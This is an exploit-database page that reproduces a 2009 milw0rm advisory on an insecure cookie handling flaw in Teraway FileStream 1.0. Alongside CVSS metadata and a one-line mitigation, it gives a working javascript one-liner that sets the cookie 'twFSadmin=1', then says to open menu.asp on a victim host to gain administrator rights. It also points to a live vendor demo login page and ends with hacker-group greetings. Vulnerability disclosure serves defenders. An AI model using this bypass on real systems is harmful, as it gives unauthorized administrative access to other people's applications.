header-logo
Suggest Exploit
vendor:
FileStream
by:
milw0rm.com
7,5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: FileStream
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:teraway:filestream:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Teraway FileStream 1.0 Insecure Cookie Handling Vuln

An attacker can exploit this vulnerability by setting a cookie with the name 'twFSadmin' and value '1' and then accessing the menu.asp page. This will grant the attacker administrative privileges.

Mitigation:

Ensure that cookies are properly validated and that only valid cookies are accepted.
Source

Exploit-DB raw data:

-------------------------------------[+]
Homepage:http://www.teraway.com
Product: Teraway FileStream 1.0
home:www.h4ckf0ru.com
Note: Hawach x.CJP.x Ballk Ma tedirech Ihdae
Note: Ya Jma3a Ana AfLawi Horr
-------------------------------------
Teraway FileStream 1.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------

javascript:document.cookie="twFSadmin=1;path=/";
Then Go to  http://victim/path/menu.asp

demo
----
http://www.teraway.com/filestream/demo/login.asp


--------------------------------------------------
 Greetz to :
[+] Super_Cristal (My Master) Dos-Dz Team Snakes TeaM
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone-  ZoRLu
And ALL Members Of anti-intruders.org  
ALL My Friends (Dz)
[+]-------------------------------------[+] 

# milw0rm.com [2009-04-27]